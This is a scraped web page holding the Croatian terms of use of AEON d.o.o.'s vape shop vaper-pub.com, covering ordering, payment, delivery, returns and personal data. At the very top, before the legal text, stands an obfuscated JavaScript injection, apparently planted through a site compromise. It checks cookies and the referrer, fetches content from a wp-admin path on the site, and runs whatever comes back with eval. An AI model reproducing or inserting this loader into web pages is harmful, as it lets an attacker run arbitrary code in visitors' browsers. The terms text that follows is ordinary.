;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Opći uvjeti korištenja

internet stranica i korištenja usluge internet trgovine

1. Opće odredbe i definicije

1.1 Ovim se Općim uvjetima korištenja internet stranica i korištenja usluge internet trgovine (“Opći uvjeti”) uređuje korištenje internet stranice od strane korisnika, te korištenje usluge internet trgovine.

1.2 U Općim uvjetima pojmovi pisani podebljanim slovima imat će značenje dano u nastavku:

“Internet stranice” označavaju sve internet stranice u vlasništvu AEON d.o.o., uključujući, ali se ne ograničavajući na vaper-pub.com.

“Korisnik” znači svaka osoba, pravna ili fizička, koja pristupa internet stranicama. Pojam “korisnik” uključuje i registriranog korisnika.

“Registrirani korisnik” predstavlja svaku potpuno poslovno sposobnu osobu, pravnu ili fizičku, koja se registrirala za korištenje internetshop usluge na internet stranicama.

“Internet trgovina” usluga je koja omogućuje registriranim korisnicima kupnju proizvoda i usluga AEON d.o.o. putem internet stranica.

AEON.hr, vaper-pub.com je organiziran od strane AEON d.o.o., Žagarova 1 – 10090 Zagreb. HR14902895532, tel: 385 91 447 77 00.
Sve podatke o AEON d.o.o. možete pronači na stranici O nama.

1.3 Pristupom internet stranicama putem odgovarajućeg tehničkog sredstva pristupa i njihovim korištenjem svaki korisnik se obvezuje poštivati ove Opće uvjete i pristaje da se na njega primjenjuju odredbe ovih Općih uvjeta.

2. Ograničenja korištenja i odgovornosti

2.1 Korisnik se obvezuje da neće:

 • koristiti internet stranice na bilo koji način koji je protivan pozitivnim propisima;
 • unositi na internet stranice ili distribuirati putem internet stranica bilo kakve sadržaje koji su protivni pozitivnim propisima, uključujući, ali se ne ograničavajući na štetne, prijeteće, uznemiravajuće, vulgarne, pornografske sadržaje ili sadržaje koji šire mržnju i netrpeljivost, sadržaje koji povređuju tuđa prava, interese i slično;
 • mijenjati, brisati ili uništavati bilo kakve podatke na internet stranicama;
 • koristiti internet stranice za kršenje prava trećih osoba, uključujući povredu tajne, prava intelektualnog vlasništva kao ni drugog prava ili interesa trećih osoba;
 • koristiti internet stranice za slanje elektroničke pošte protivne ovim Općim uvjetima;
 • putem internet stranica unositi ili distribuirati bilo kakav nelegalan software, uključujući, ali se ne ograničavajući na: viruse, spyware, trojane ili slično.

2.2 Dokumenti, podaci i informacije objavljeni na internet stranicama ne smiju se reproducirati, distribuirati ili na bilo koji način koristiti u komercijalne svrhe bez izričitog pristanka AEON d.o.o. ili na bilo koji način koji može uzrokovati štetu AEON d.o.o. ili bilo kojoj trećoj strani. Dokumenti, podaci i informacije objavljeni na ovoj internet stranici mogu se koristiti samo za individualne potrebe korisnika uz poštivanje svih autorskih i vlasničkih prava te prava trećih osoba.

2.3 Korištenjem sadržaja ovih internet stranica, korisnik prihvaća (i) sve rizike koji nastaju iz korištenja internet stranica te prihvaća (ii) koristiti sadržaj internet stranica isključivo za osobnu uporabu i na vlastitu odgovornost.

2.4 AEON d.o.o. se u potpunosti odriče svake odgovornosti (i) koja na bilo koji način može nastati iz, ili je na bilo koji način vezana za korištenje internet stranica, (ii) za bilo koje radnje korisnika uporabom ili zlouporabom sadržaja internet stranica te za (iii) bilo kakvu štetu koja može nastati korisniku ili bilo kojoj trećoj strani u vezi s uporabom ili zlouporabom korištenja sadržaja internet stranica.

2.5 Internet stranice sadrže i dokumente, podatke, informacije kao i veze (“linkove”) do drugih internet stranica kreiranih od strane trećih osoba koje će se, u opsegu u kojem je to potrebno i moguće, kao takve označavati. AEON d.o.o. nema nikakav nadzor nad navedenim dokumentima, podacima, informacijama ili drugim internet stranicama te se u potpunosti odriče svake odgovornosti, uključujući, ali ne ograničeno na, točnost, potpunost i dostupnost sadržaju na internet stranicama kreiranim od strane trećih osoba. AEON d.o.o. se odriče svake odgovornosti zbog bilo kojeg sadržaja prikazanog na takvim stranicama trećih osoba, kao i zbog eventualnih proizvoda ili usluga koji su se stekli putem takvih trećih stranica. Neće se smatrati da su takve treće osobe na bilo koji način povezane sa AEON d.o.o. samo zbog postojanja veze s internet stranicom.

2.6 AEON d.o.o. zadržava pravo izmjene sadržaja internet stranica, pravo ukidanja internet stranica i pravo ograničavanja pristupa internet stranicama (sve bez najave) te neće biti odgovoran ni za kakve moguće posljedice proizašle iz takvih promjena, ukidanja ili ograničavanja.

2.7 AEON d.o.o. neće biti odgovoran ni za kakve moguće posljedice proizašle iz nedostupnosti internet stranica zbog bilo kakvih tehničkih razloga.

2.8 AEON d.o.o. zadržava pravo promjene cijena svojih proizvoda i usluga. Važeće cijene svih proizvoda i usluga objavljene su u službenom cjeniku AEON d.o.o. koji je dostupan na adresi društva.

2.9 AEON d.o.o. zadržava pravo da spriječi pristup internet stranicama IP adresama ili korisničkim računima s kojih se vrše radnje protivne ovim Općim uvjetima te s te osnove neće snositi nikakvu odgovornost.

2.10 AEON d.o.o. niti na koji način ne odgovara korisnicima za troškove koje snose korištenjem računalne opreme i telekomunikacijskih sustava radi pristupa internet stranicama i usluzi internetske trgovine.

2.11 AEON d.o.o. ima pravo ukinuti skupljanje Puff bodova bez objašnjenja te ukinuti postojeće – pogotovo ukoliko osoba zlorabi stranice i Puff sustav bodovanja te povlastice koje oni donose. AEON d.o.o. također ne odgovara za slučajeve u kojima klijent želi naručiti artikl koji nije isporučiv i na njega želi potrošiti bodove. AEON d.o.o. nije obvezan isporučiti artikl ukoliko je on trenutno nedostupan.

2.12 AEON d.o.o. ima pravo stornirati narudžbu i korisnički račun ukoliko prema mišljenju uprave i administracije kupac zlouporabi ponuđene opcije.

3. Intelektualno vlasništvo

3.1 Korisnik prihvaća da je cjelokupan sadržaj internet stranica isključivo vlasništvo AEON d.o.o. ili njegovih ovlaštenika.

3.2 Korištenjem internet stranica korisniku se daje ograničena, neisključiva, neprenosiva i opoziva dozvola za korištenje sadržaja internet stranica na način da se iste pregledavaju za osobne svrhe.

3.3 Radi izbjegavanja svake sumnje, AEON d.o.o. izričito zadržava i ne prenosi na korisnika bilo koja druga prava u odnosu na sadržaj internet stranica te zabranjuje korištenje sadržaja internet stranica, osim kako je to određeno ovim Općim uvjetima i kako je to eventualno dozvoljeno uputama na samim internet stranicama.

3.4 Korisnik osobito nema pravo, sadržaj ove internet stranice: skidati, umnožavati, mijenjati, uređivati, distribuirati, prikazivati, brisati, slati, prodavati, preprodavati, prilagođavati, stvarati mu izvedenice, uključivati na druge internet stranice i/ili medije ili ga pak koristiti na bilo koji drugi način osim za osobne svrhe i/ili kućnu uporabu.

3.5 Ukoliko je to izričito dopušteno na internet stranicama, korisnik će imati pravo skidati (“download”) određene sadržaje. U takvom slučaju korisnik se obvezuje da će takav sadržaj koristiti isključivo za osobnu uporabu te da će u odnosu na takav sadržaj u cijelosti poštivati odredbe ovih Općih uvjeta.

3.6 Stavljanjem podataka na internet stranice od strane korisnika (“upload”), uključujući fotografije – isti postaju isključivo vlasništvo AEON d.o.o.

4. Zaštita osobnih podataka

4.1 Prije pristupa određenim sadržajima korisnici će biti obvezni dati AEON d.o.o. osobne podatke. U slučaju pristanka na davanje osobnih podataka, smatrat će se da su korisnici pristali na uvjete korištenja osobnih podataka predviđene ovim Općim uvjetima, a temeljem kojih se određenim osobama daje pravo da prikupljaju, koriste, obrađuju i prenose osobne podatke potrebne za korištenje internet stranica.

4.2 Označavanjem odgovarajuće “kućice” na internet stranicama smatra se da korisnik pristaje na prikupljanje, korištenje, obradu i prenošenje osobnih podataka potrebnih za korištenje internet stranica, uključujući, ali se ne ograničavajući na:

 • suglasnost da AEON d.o.o. može, sukladno odredbama Zakona o zaštiti osobnih podataka, obrađivati dane osobne podatke za potrebe vlastitih evidencija i pružanja drugih usluga, potrebe stvaranja baze podataka o kupcima, obavještavanja o novim proizvodima i uslugama te unapređenja usluga i da AEON d.o.o. navedene podatke može davati trećim stranama, a u svrhu izvršavanja usluge, zaštite interesa korisnika i AEON d.o.o. te sprječavanja eventualnih zlouporaba;
 • potrebe razmjene podataka za rubriku “ljudski resursi”, odnosno mogućnost zaposlenja u AEON d.o.o.;
 • potrebe stvaranja baze podataka o zainteresiranim radnicima AEON d.o.o.;
 • slanje obavijesti o mogućnosti zaposlenja u AEON d.o.o.;
 • potrebe što boljeg uvida i razumijevanja pojedinačnih potreba i zahtjeva korisnika kao i razvijanja mogućnosti što kvalitetnijeg pružanja svih usluga AEON d.o.o., a na zadovoljstvo korisnika;
 • davanje podataka drugim osobama potrebnim za izvršenje gore navedenih svrha.

4.3 AEON d.o.o. će čuvati osobne podatke samo koliko je to potrebno za svrhe predviđene ovim Općim uvjetima. Nakon proteka tog vremena osobni podaci će se uništiti, izbrisati ili učiniti anonimnima na način koji osigurava da se zadrži sigurnost osobnih podataka.

4.4 AEON d.o.o. neće razotkriti osobne podatke trećim osobama, osim osobama iz njegove grupe trgovačkih društava.

4.5 AEON d.o.o. će osigurati da se osobni podaci drže na sigurnom mjestu (koje uključuje razumnu administrativnu, tehničku i fizičku zaštitu kako bi se onemogućilo neovlašteno korištenje, pristup, razotkrivanje, kopiranje ili izmjena osobnih podataka), a kojem mogu pristupiti samo za to ovlaštene osobe.

4.6 AEON d.o.o. će omogućiti korisnicima pristup njihovim osobnim podacima koje posjeduje kako bi osigurao da su osobni podaci točni, potpuni i ažurirani.

4.7 Ukoliko korisnici imaju bilo kakvih pitanja vezano uz korištenje osobnih podataka mogu kontaktirati izravno AEON d.o.o.

4.8 Ukoliko korisnici zatraže brisanje njihovih osobnih podataka, AEON d.o.o. će takve podatke ukloniti, no time pristaju da će im biti onemogućen pristup određenim sadržajima na internet stranicama.

4.9 Prilikom davanja osobnih podataka, korisnik jamči da su isti potpuni, istiniti, točni i ažurni.

5. Korištenje usluge internet trgovine i registracija korisnika

5.1 Korištenje usluge internet trgovine je dostupno isključivo registriranim korisnicima koji su punoljetni i potpuno poslovno sposobni, što potvrđuju korištenjem usluge internet trgovine.

5.2 Registracija korisnika se vrši putem internet stranica, prilikom čega će korisnik biti obvezan upisati određene osobne podatke i pristati na korištenje takvih osobnih podataka.

5.3 Nakon uspješne registracije, registrirani korisnik dobiva na korištenje korisničko ime i lozinku koji služe za autorizaciju korištenja usluge internet trgovine. Registrirani korisnik je obvezan čuvati tajnost korisničkog imena i lozinke. Ukoliko korisnik posumnja u neautorizirano korištenje svojeg korisničkog imena i/ili lozinke, on je odgovoran za sve moguće troškove izazvane korištenjem njegova korisničkog imena i/ili lozinke do trenutka dok o sumnji na neautorizirano korištenje ne obavijesti AEON d.o.o. putem kontakata objavljenih na internet stranici. Korisnik je odgovoran i za sve nedozvoljene aktivnosti autorizirane i izvršene pod njegovim korisničkim imenom i/ili lozinkom.

5.4 Registracijom korisnik potvrđuje:

 • da u cijelosti prihvaća ove Opće uvjete, a posebno u dijelu u kojem se oni odnose na usluge internet trgovine;
 • potpunost, točnost, istinitost i ažurnost osobnih podataka;
 • da daje AEON d.o.o. izričitu suglasnost da može sukladno odredbama Zakona o zaštiti osobnih podataka, obrađivati dane osobne podatke za potrebe vlastitih evidencija i pružanja drugih usluga, potrebe stvaranja baze podataka o kupcima, obavještavanja o novim proizvodima i uslugama te unapređenja usluga kao i da AEON d.o.o. navedene podatke može davati trećim stranama, a u svrhu izvršavanja usluge, zaštite interesa korisnika i AEON d.o.o. te sprečavanja eventualnih zlouporaba.

5.5 Registrirani korisnik pristaje da se usluga kupnje putem internet trgovine vrši na način da registrirani korisnik kupuje proizvode i usluge dostupne putem internet trgovine na način da ih bira na temelju slike i osnovnog opisa proizvoda. Slike proizvoda su samo ilustrativne prirode te ne moraju uvijek i u svim detaljima odgovarati proizvodima koji su stvarno dobavljivi. S obzirom na mogućnost individualnog podešavanja monitora na računalu, razlike u percepciji boje proizvoda od strane ljudskog oka i sl., AEON d.o.o. ne jamči potpunu sukladnost boja proizvoda s bojama kako ih registrirani korisnik vidi na zaslonu svog monitora.

5.6 Narudžba proizvoda se vrši elektronskim putem. Klikom na ikonu “U košaricu”, odabrani proizvod sprema se u potrošačku košaricu. Za nastavak procedure potrebno je kliknuti “POGLEDAJTE KOŠARICU” gdje se nalaze svi odabrani artikli. Roba se smatra naručenom u trenutku kada kupac prođe cijeli proces narudžbe. Na e-mail adresu kojom ste se registrirali kao kupac, dobit ćete potvrdu da je narudžba zaprimljena od strane AEON d.o.o..

5.7 Ukoliko AEON d.o.o. nije u mogućnosti isporučiti neki od naručenih proizvoda, kontaktirat će kupca telefonski ili putem elektronske pošte (e-mail-a) te ga obavijestiti o navedenom. Kupac ima opciju otkazati naručeni proizvod ili zatražiti zamjenski proizvod.

6. Cijene proizvoda i usluga na internet trgovini

6.1 Cijene proizvoda izražene su u hrvatskim kunama (“HRK”) i uključuju porez na dodanu vrijednost (“PDV”). AEON d.o.o. može odrediti određene popuste na kupovinu putem internet trgovine, a koji se mogu odnositi na određeno vremensko razdoblje, ali se navedeni popusti neće odnositi na jasno označene artikle i proizvode u kategoriji “Akcijski artikli”.

6.2 Cijene proizvoda su podložne promjenama do trenutka potvrde kupovine.

6.3 Potvrdom kupovine, registrirani korisnici završavaju postupak kupovine putem internet trgovine. Ugovor o kupoprodaji je sklopljen u trenutku primitka plaćanja od strane AEON d.o.o.

6.4 Cijena dostave kupljenih proizvoda nije uključena u cijenu proizvoda.

6.5 Zbog vrlo velikog broja artikala, nekad postoji vjerojatnost da je određena cijena artikla ili kriva, ili zbog greške u sistemu čak i 0 kuna. U slučaju da želite kupiti takav proizvod svakako se konzultirajte s nama putem kontakt forme ili e-maila.

6.6 Određeni kuponi za popust nisu kompatibilni sa ostalim kuponima za popust (te se ne mogu kombinirati i koristiti istovremeno) ili proizvodima koji su već na akciji. Ukoliko je proizvod već snižen tada na njega kupon za popust neće vrijediti.

7. Načini plaćanja proizvoda putem internet trgovine

7.1 Registrirani korisnici mogu plaćati proizvode na slijedeće načine, prilikom čega se izbor vrši na internet stranicama: 

 • plaćanje uplatom na žiro račun tvrtke: AEON d.o.o. – HR2323400091110774848
 • plaćanje prilikom preuzimanja 
 • plaćanje skupljenim bodovima koje akumulirate korištenjem stranice

7.2 Izjava o sigurnosti plaćanja kreditnim karticama

Plaćanje i kupovina na našim internet stranicama je potpuno sigurna. Za plaćanje kreditnim karticama putem naše internet trgovine koristimo T-Com Pay Way Getway servis za internet naplatu.

T-Com Pay Way primjenjuje najmodernije standarde u zaštiti podataka – Secure Socket Layer (SSL) protokol sa 128-bitnom enkripcijom podataka i MD5 algoritam. ISO 8583 protokol osigurava da se razmjena podataka između T-Com sustava i autorizacijskih centara kartičnih kuća obavlja u privatnoj mreži koja je od neautoriziranog pristupa zaštićena dvostrukim slojem “vatrozida” (firewall).

T-com PayWay - Sigurna online autorizacija i plaćanje
American Express - Jamstvo sigurne online kupnje
MasterCard - SecureCode
Verified by VISA

7.3 Prilikom plaćanja pouzećem, registrirani korisnik na svoju e-mail adresu dobiva ponudu i sve podatke koji su potrebni kako bi mu se dostavili odabrani proizvodi.

7.4 Sve cijene u internet trgovini vaper-pub.com izražene su u kunama te uključuju PDV.

8. Usluge dostave putem internet trgovine

8.1 AEON d.o.o. dostavlja proizvode po cijelom svijetu.

8.2 Nakon što AEON d.o.o. evidentira narudžbu (najkasnije u roku od 24 sata od narudžbe proizvoda od strane registriranog korisnika što se primjenjuje isključivo ukoliko takav rok istječe tijekom radnog dana u Republici Hrvatskoj te se ne odnosi na neradne dane) registriranom korisniku će proizvodi biti isporučeni u roku: 

 • GLS – do 3 radna dana
 • Hrvatska Pošta – do 5 radnih dana

8.3 Ukoliko iz bilo kojeg razloga korisnik nije bio dostupan putem kontakt broja kojeg je naveo prilikom registracije ili kupovine, tvrtka AEON d.o.o. nije odgovorna za produljenje prethodno navedenih rokova isporuke.

8.4 Korisniku će narudžba biti isporučena na adresu dostave koju je naveo prilikom registracije ili kupovine, a ukoliko se u trenutku dostave korisnik ne nalazi na adresi dostave:

 • biti će mu ostavljena poruka s brojem telefona/mobitela kojeg će moći kontaktirati ili
 • proizvodi mogu biti preuzeti od strane druge osobe (punoljetni član domaćinstva, ovlaštena osoba od strane registriranog korisnika), a uz predočenje osobnog identifikacijskog dokumenta.

8.5 Prilikom preuzimanja pošiljke, registrirani korisnik je obvezan istu pregledati, a vidljiva oštećenja prijaviti izravno dostavljaču te odbiti primiti oštećenu pošiljku. Potpisom računa/otpremnice registrirani korisnik potvrđuje da je prilikom preuzimanja proizvoda izvršio njegov pregled. Ukoliko registrirani korisnik odbije primiti pošiljku zbog utvrđenih i vidljivih oštećenja na transportnim pakiranjima, dužan je ispuniti odgovarajući obrazac dostavne službe te se javiti AEON d.o.o. putem e-mail-a, telefonski ili putem korisničkih uputa na internet trgovini te se izjasniti da li želi ponovljenu isporuku ili povrat novca. Po primitku reklamirane pošiljke i odgovarajućeg obrasca, AEON d.o.o. se obvezuje u roku od idućih 15 dana izvršiti ponovljenu dostavu bez dodatnih troškova za korisnika ili izvršiti povrat novca, a sve sukladno zahtjevu registriranog korisnika.

8.6 Ukoliko registrirani korisnik ne preuzme proizvod ili ga odbije preuzeti bez valjanog razloga, AEON d.o.o. zadržava pravo zahtijevati nadoknadu nastalih troškova.

8.7 AEON d.o.o. ne odgovara za eventualne nastale troškove naplaćene kupcu od strane trećih osoba – primjerice Carinske uprave države u kojoj je kupac naručio robu. Isto tako – AEON d.o.o. ne snosi odgovornost ukoliko Carina države u kojoj se nalazi kupac uništi robu ili zabrani uvoz. AEON d.o.o. se odriče bilo kakve odgovornosti u tim slučajevima te ne može snositi troškove povrata ili izvršiti povrat sredstava. Ukoliko se kao kupac nalazite u državi koja nije član EU, molimo Vas da pomno proučite zakone i zakonske propise kako vaši paketi ne bi bili zaustavljeni na carini ili kako Vi sami ne bi imali eventualne dodatne troškove ili štete uslijed carinjenja, sanitarnih inspekcija ili uništenja naručene robe.

9. Rezervacija proizvoda putem usluge internet trgovine

9.1 Proizvodi koje registrirani korisnik stavi u košaricu nisu rezervirani. Proizvod je rezerviran tek nakon potvrde plaćanja od strane registriranog korisnika.

9.2 U periodu između stavljanja proizvoda u košaricu i potvrde plaćanja postoji mogućnost da količine proizvoda više nisu dostupne putem usluge internet trgovine, o čemu će registrirani korisnik biti obavješten putem telefona ili e-mail-a kojeg je ostavio prilikom kupovine/registracije na internet trgovini.

10. Povrat kupljenih proizvoda putem usluge internet trgovine

10.1 Ukoliko prilikom preuzimanja robe registrirani korisnik uoči nedostatke na proizvodima ili su dostavljeni proizvodi neispravni – ima pravo na reklamaciju kupljenog proizvoda ili povrat proizvoda u roku od četrnaest (14) kalendarskih dana, a od dana dostave proizvoda. AEON d.o.o. će, na osnovu zahtjeva za povrat ili zamjenu, registriranom korisniku vratiti sredstva na račun kojeg je korisnik naveo u samom zahtjevu ili mu zamijeniti proizvod novim u roku trideset (30) dana od datuma primitka vraćenog proizvoda na adresu navedenu u obrascu za reklamaciju. Za sve proizvode koji su kontaminirani (otvaranjem bočice) povrat neće biti moguć.

10.2 Registrirani korisnik najavljuje povrat kupljenih proizvoda dopisom na e-mail narudzbe@aeon.hr

10.3 Povrat dostavljenih proizvoda vrši se dostavom na adresu – AEON d.o.o., Žagarova 1 – 10090 Zagreb

10.4 Troškove povrata proizvoda snosi registrirani korisnik.

10.5 Registrirani korisnik je obvezan dostavljene proizvode vratiti u stanju u kojem su mu dostavljeni te u originalnom pakiranju (trgovačko pakiranje u kojem je roba i dostavljena).

10.6 Ukoliko se nedvojbeno utvrdi da je reklamacija na proizvod neopravdana ili da je do neispravnosti naručenog proizvoda došlo zbog neadekvatnog rukovanja ili uporabe, tada AEON d.o.o. nije dužan izvršiti povrat novca ili dostaviti zamjenski proizvod. Reklamirani proizvod bit će vraćen korisniku o njegovom trošku uz pisano objašnjenje razloga neprihvaćanja zahtjeva za povratom ili zamjenom.

10.7 Ukoliko je zahtjev za povratom novca ili zamjenom opravdan, AEON d.o.o. će postupiti kako je navedeno u točci 10.1 s time da će trošak ponovnog slanja proizvoda snositi AEON d.o.o.

10.8 Ukoliko je došlo do pogreške prilikom pakiranja naručenih proizvoda i kupac nije dobio naručeni proizvod već neki drugi – dužan je navedeno prijaviti dopisom na e-mail narudzbe@aeon.hr ili putem broja telefona 091 447 77 00 i to najkasnije u roku od osam (8) dana. U tom slučaju, korisnik vraća krivo isporučen proizvod na trošak AEON d.o.o. koji se obvezuje isporučiti naručeni proizvod ili izvršiti povrat novca (sukladno zahtjevu korisnika) u roku od petnaest (15) dana od zaprimljenog krivo isporučenog artikla.

10.9 Ukoliko korisnik nije dobio naručeni i plaćeni proizvod, dužan je to, putem obrasca za reklamaciju ili putem kontakata objavljenih na internet stranici, prijaviti u roku od osam (8) kalendarskih dana od dana očekivanog dolaska naručenog proizvoda. AEON d.o.o. je u tom roku dužan utvrditi što se dogodilo sa reklamiranom pošiljkom te korisnika obavijestiti o daljnjem rješavanju reklamacije.

11. Ostali uvjeti usluge internet trgovine

11.1 AEON d.o.o. ne snosi odgovornost za eventualnu štetu koja može nastati registriranom korisniku i trećim stranama:

 • uslijed neautoriziranog korištenja korisničkog imena i lozinke ili ako su iste povezane sa takvim korištenjem,
 • u vezi s uporabom ili zlouporabom korištenja usluge internet trgovine, a ako predmetna šteta nije nastala krivnjom AEON d.o.o.
 • u vezi s uporabom ili zlouporabom proizvoda kupljenih na internet trgovini vaper-pub.com

11.2 AEON d.o.o. ne snosi odgovornost za bilo koju štetu koja bi mogla nastati zbog prekida internetske veze prilikom korištenja usluge internet trgovine.

11.3 Na korištenje usluge internet trgovine primjenjivat će se odredbe važećeg Zakona o elektroničkoj trgovini i ostalih zakona koji se odnose na pružanje i korištenje usluge internet trgovine.

11.4 AEON d.o.o. nije farmaceutska tvrtka i naši proizvodi ne služe za odvikavanje od pušenja. Ukoliko se želite odviknuti od pušenja potražite savjet liječnika ili ljekarnika.

12. Izmjene Općih uvjeta i ostale odredbe

12.1 AEON d.o.o. zadržava pravo izmijeniti ove Opće uvjete bez prethodne najave. Registrirani korisnici su dužni prilikom svakog korištenja internet stranica, a posebno usluga internet trgovine, provjeriti važeće Opće uvjete. Važeći opći uvjeti bit će objavljeni na internet stranicama.

12.2 Za korištenje usluge internet trgovine, važeći su opći uvjeti na snazi u trenutku primitka cijene za naručeni proizvod.

12.3 Svi sporovi koji mogu nastati temeljem ovih Općih uvjeta rješavat će se pred nadležnim sudom u Zagrebu.

13. Obavijest o načinu podnošenja prigovora potrošača

Sukladno čl. 10., st 3. Zakona o zaštiti potrošača (Narodne nov. br.41/14) obavještavamo potrošače da nezadovoljstvo na kupljene proizvode ili pružene usluge mogu iskazati prigovorom te isto dostaviti u pisanoj formi, a putem pošte na adresu:

AEON d.o.o.
Žagarova 1
10090 Zagreb

ili putem elektroničke pošte na e-mail adresu: narudzbe@aeon.hr

Trgovac se obvezuje odgovoriti u pisanom obliku. Odgovor na Vaš prigovor dat ćemo u pisanom obliku najkasnije 15 dana od zaprimanja prigovora.
Podnositelj prigovora mora dostaviti ime i prezime te adresu za dostavu odgovora.